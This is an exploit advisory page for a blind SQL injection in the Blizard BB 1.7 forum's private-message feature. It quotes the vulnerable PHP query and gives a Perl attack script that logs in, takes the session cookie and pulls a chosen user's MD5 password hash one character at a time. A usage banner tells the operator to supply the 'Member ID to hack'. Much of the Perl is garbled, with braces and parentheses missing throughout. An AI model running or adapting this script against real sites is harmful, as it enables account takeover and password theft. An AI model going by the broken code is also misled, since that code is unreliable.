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Blizard BB 1.7 (privtmsg) MD5 Hash Retrieve Blind sql injection Exploit
来源: staker[at]hotmail[dot]it 作者:StAkeR 发布时间:2017-03-01  
# ------------------------------------------------------------------------
# [+] Blizard BB 1.7 (privtmsg) MD5 Hash Retrieve (blind sql injection)
# ------------------------------------------------------------------------
# [*] Discovered by Juri Gianni - Turin,Italy
# [*] staker - staker[at]hotmail[dot]it / shrod9[at]gmail[dot]com
# [*] Discovered on 28/02/2017
# [*] Category: WebApp
# [*] BUG: Blind SQL Injection
# --------------------------------------------------------------------------
#   [-] File privmsg.php
#   function new_send($pref, $username, $sel_smiles, $data, $newgo){
#       $destinatario=stripslashes($_POST['destinatario']);
#       $checkif = mysql_query("SELECT * FROM ".$pref."_users WHERE username = '$destinatario'");
#       $title=stripslashes($_POST['title']);
#       $message=stripslashes($_POST['message']);
#    if (empty($title)){
#    $title="No Title";
#    }
#       if (((!empty($message)) and (mysql_num_rows($checkif) > 0))){  
#       mysql_query("INSERT INTO ".$pref."_private_messages VALUES ('', '$username', '$destinatario', '$title', '$message', '$data', '0');"); <-- bad query
#       echo "<div class='success'>"._PRIVMSG_SENDER_OK."</div>";
#       redirect("privmsg.php", 2);
#       } else {
#               echo "<div class='error'>".PRIVMSG_NOEMPTY."</div>";
#       }
# }
# ----------------------------------------------------------------------------
# WWZ :)
use strict;
use IO::Socket::INET;
my ($host,$username,$password,$uid) = @ARGV;
if (@ARGV != 4) { usage(); }
my $path = "/blizardbb17/html/"; # Insert a valid path if required.
                                 # Change it with your hands
my @chars = (48..57, 97..102); 
my ($i,$ord,$hash) = (1,undef,undef);
my $cookie = login();
syswrite(STDOUT, "[-] Trying to retrieve MD5 Hash: ");
for ($i=0;$i<=32;$i++) 
   foreach $ord (@chars
      if (send_msg(sql($i,$ord)) == 666) 
                  $hash .= chr($ord);
          if ($i == 2 and not defined $hash
             syswrite(STDOUT,"\n[-] Exploit Failed");
if (length($hash) == 32) {
   die "\[-]Exploit Successfully";
else {
   die "\n[-] Exploit Failed";
sub sql
      my ($i,$j,$sql) = (shift,shift,undef);
      $sql = "shrod ' AND ASCII(SUBSTRING((SELECT password FROM bz_users WHERE uid=".$uid."),".$i.",1))=".$j."#";
      return $sql;        
sub parse_url()
   if ($_[0] =~  m{^http://(.+?)$}i ) { 
       $_[0] = $1
sub login() {
my ($PHPSESSID,$content,$packet);
my $data = "username=".$username."&password=".$password."&red_url=".$host.$path."login.php&login=Login";
my $socket  = new IO::Socket::INET(
                                   PeerAddr => $host,
                                   PeerPort => 80,
                                   Proto    => 'tcp',
                                  ) or die $!;
$packet .= "POST ".$path."login.php HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: Lynx (textmode)\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length:".length($data)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet.= $data;
 while (<$socket>) {
     $content .= $_;
  if($content =~ /PHPSESSID=(.+?);/) { 
   $PHPSESSID = $1
   return $PHPSESSID;
     die $!;
sub send_msg() {
my ($payload,$content,$packet) = (shift,undef,undef);
my $data2 = "title=IZI&destinatario=".$payload."&message=asdasd&newgo=Nuovo+Messaggio";
my $socket  = new IO::Socket::INET(
                                   PeerAddr => $host,
                                   PeerPort => 80,
                                   Proto    => 'tcp',
                                  ) or die $!;
$packet .= "POST ".$path."privmsg.php?type=new HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: Lynx (textmode)\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Cookie: PHPSESSID=".$cookie."\r\n";
$packet .= "Content-Length:".length($data2)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet.= $data2;
 while (<$socket>) {
     $content .= $_;
if ($content  =~ /Messaggio inviato/) {
    return 666;
    return 0; }
sub usage() {
        print "[*---------------------------------------------------------*]\n".
              "[* Blizard BB 1.7 (privtmsg) Blind SQL Injection Exploit   *]\n".
              "[* Usage: perl web.pl [host] [username] [password] [uid]   *]\n".
              "[*                                                         *]\n".
              "[* Options:                                                *]\n".
              "[* [host] insert a valid host                              *]\n".
              "[* [username] insert your username                         *]\n".
              "[* [password] insert your password                         *]\n".
              "[* [uid] Member ID to hack                                 *]\n".

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